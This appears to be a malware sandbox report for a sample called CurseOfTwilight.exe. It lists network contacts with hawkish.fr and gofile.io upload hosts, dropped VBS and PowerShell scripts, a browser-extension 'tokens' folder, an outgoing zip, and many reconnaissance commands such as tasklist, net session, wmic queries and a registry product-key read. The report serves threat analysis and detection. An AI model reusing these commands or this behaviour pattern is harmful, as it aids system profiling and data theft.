| US | 8.8.8.8:53 | 233.10.175.136.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hawkish.fr | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| GB | 89.213.140.115:443 | hawkish.fr | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| GB | 89.213.140.115:443 | hawkish.fr | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| GB | 89.213.140.115:443 | hawkish.fr | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.140.213.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.121.82.140.in-addr.arpa | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| GB | 89.213.140.115:443 | hawkish.fr | tcp |
| GB | 89.213.140.115:443 | hawkish.fr | tcp |
| GB | 89.213.140.116:443 | nova-sentinel.com | tcp |
| GB | 89.213.140.115:443 | hawkish.fr | tcp |
| FR | 51.178.66.33:443 | api.gofile.io | tcp |
| GB | 89.213.140.115:443 | hawkish.fr | tcp |
| US | 136.175.10.233:443 | store3.gofile.io | tcp |
| GB | 89.213.140.115:443 | hawkish.fr | tcp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
Files
\Users\Admin\AppData\Local\Temp\58baf7ba-050c-4af7-a102-440b9761fa9b.tmp.node
\Users\Admin\AppData\Local\Temp\5db94c80-4118-41f4-bfaa-59868be793d2.tmp.node
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0hi515uc.pp5.ps1
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Roaming\RGyqVfeN3YcR.vbs
C:\Users\Admin\AppData\Local\Temp\kbuL5EmJfXIQ_tezmp.ps1
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_P0HaCU.vbs
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo.png
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo128.png
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo16.png
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo48.png
C:\Users\Admin\AppData\Local\Temp\GB_NOVA_Admin_89.zip
Analysis: behavioral6
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:47
Platform
win10-20240221-en
Max time kernel
130s
Max time network
137s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3dcompiler_47.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:47
Platform
win10-20240221-en
Max time kernel
123s
Max time network
141s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\locales\de.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 129.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jhwwhume.t0n.ps1
Analysis: behavioral14
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:47
Platform
win10-20240221-en
Max time kernel
127s
Max time network
139s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1360 wrote to memory of 4020 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1360 wrote to memory of 4020 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1360 wrote to memory of 4020 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 620
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 80.192.122.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:47
Platform
win10-20240221-en
Max time kernel
20s
Max time network
164s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Enumerates physical storage devices
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
Runs net.exe
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe
"C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\CurseOfTwilight.exe
C:\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\CurseOfTwilight.exe
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.0.1577908248\793586513" -parentBuildID 20221007134813 -prefsHandle 1732 -prefMapHandle 1720 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eb571834-4296-413b-af3d-1fcec78d8caf} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 1832 1fd2cd04758 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.1.981144421\1706223644" -parentBuildID 20221007134813 -prefsHandle 2156 -prefMapHandle 2152 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e4b92c2e-9dca-45c7-9cdd-51fb9a39d037} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 2168 1fd19770458 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.2.1726920197\1630438161" -childID 1 -isForBrowser -prefsHandle 2940 -prefMapHandle 2936 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b09cb880-ddf0-4687-8e04-21fc24439098} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 2948 1fd2fdab858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.3.505248057\7527498" -childID 2 -isForBrowser -prefsHandle 2332 -prefMapHandle 2328 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e8b7f479-edcf-4c40-abb7-0c63f94587f4} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 3056 1fd19769358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.4.243396272\1789515667" -childID 3 -isForBrowser -prefsHandle 4152 -prefMapHandle 4164 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {402ba497-1b63-4780-8e68-57101ef2457f} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 4376 1fd319db158 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.5.1408002128\257508417" -childID 4 -isForBrowser -prefsHandle 4784 -prefMapHandle 4776 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2b3d7de-017d-49bd-a719-e5f01ce2cbaf} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 4808 1fd1976ab58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.6.524114940\406056401" -childID 5 -isForBrowser -prefsHandle 4940 -prefMapHandle 4944 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {59c3c8c3-e948-4501-b61a-a30b1105cd7c} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 4932 1fd32199058 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.7.1224361594\817426020" -childID 6 -isForBrowser -prefsHandle 5128 -prefMapHandle 5132 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {dd1adc2e-5ca8-4247-925b-323f044793e3} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 4744 1fd32198d58 tab
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\CurseOfTwilight.exe
"C:\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\CurseOfTwilight.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1880 --field-trial-handle=1900,i,2978336832879354427,6294707759333432041,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
C:\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\CurseOfTwilight.exe
"C:\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\CurseOfTwilight.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=2056 --field-trial-handle=1900,i,2978336832879354427,6294707759333432041,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4840 get ExecutablePath"
C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=4840 get ExecutablePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "net session"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\Wbem\WMIC.exe
wmic OS get caption, osarchitecture
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\more.com
more +1
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\net.exe
net session
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.8.1309269420\1383074398" -childID 7 -isForBrowser -prefsHandle 4528 -prefMapHandle 5460 -prefsLen 26593 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ddb64d1-dc6f-4732-ae02-bf2bb50e59a6} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 5508 1fd329a4f58 tab
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
C:\Windows\system32\more.com
more +1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController get name
C:\Windows\system32\more.com
more +1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.9.1528496629\768241757" -childID 8 -isForBrowser -prefsHandle 3784 -prefMapHandle 5660 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5eb062e6-7c8f-428e-9094-6031a41c8dc1} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 4528 1fd329a4c58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
